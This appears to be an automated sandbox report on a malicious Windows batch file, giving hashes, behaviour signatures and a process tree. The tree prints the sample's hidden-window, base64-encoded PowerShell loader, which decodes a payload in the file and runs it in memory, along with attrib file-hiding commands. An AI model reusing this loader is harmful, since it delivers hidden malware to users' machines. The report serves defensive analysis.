Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
09-11-2024 19:11
Static task
static1
Behavioral task
behavioral1
Sample
New folder/08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
New folder/08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
New folder/8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
New folder/8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
New folder/fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat
Resource
win7-20241023-en
Behavioral task
behavioral6
Sample
New folder/fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat
Resource
win10v2004-20241007-en
General
-
Target
New folder/08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat
-
Size
1.1MB
-
MD5
ab0d98e0b9af05d94e139284507c0d3b
-
SHA1
0d3297b0a0bce6f0dde0b91146a66ed78c9b9d2c
-
SHA256
08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d
-
SHA512
f260e37db9c406ba6a6ae5c1472def4e545af5366e9d514066470d7a8506b85f01ce6a1ee274d7cf137a11684268379cddeab8f055ffe75d150b264fdee1884c
-
SSDEEP
24576:w9vetj7JB95zNrhS01VX3LBc41Y35qdJQhgjGlCG9LuPQV+J7zrzLElSmRxx7o:jrXn+30QeGoU4TElSr
Malware Config
Signatures
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Executes dropped EXE 1 IoCs
Processes:
08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exepid process 2764 08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exepid process 2764 08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exepid process 2764 08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exedescription pid process Token: SeDebugPrivilege 2764 08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
cmd.exedescription pid process target process PID 2912 wrote to memory of 316 2912 cmd.exe attrib.exe PID 2912 wrote to memory of 316 2912 cmd.exe attrib.exe PID 2912 wrote to memory of 316 2912 cmd.exe attrib.exe PID 2912 wrote to memory of 2764 2912 cmd.exe 08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe PID 2912 wrote to memory of 2764 2912 cmd.exe 08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe PID 2912 wrote to memory of 2764 2912 cmd.exe 08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe PID 2912 wrote to memory of 2764 2912 cmd.exe 08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe PID 2912 wrote to memory of 2312 2912 cmd.exe attrib.exe PID 2912 wrote to memory of 2312 2912 cmd.exe attrib.exe PID 2912 wrote to memory of 2312 2912 cmd.exe attrib.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 316 attrib.exe 2312 attrib.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\system32\attrib.exeattrib +s +h "C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat".exe2⤵
- Sets file to hidden
- Views/modifies file attributes
PID:316
-
-
C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe"C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgAG54KgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwBueCcAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
C:\Windows\system32\attrib.exeattrib -s -h "C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat".exe2⤵
- Views/modifies file attributes
PID:2312
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe
Filesize442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f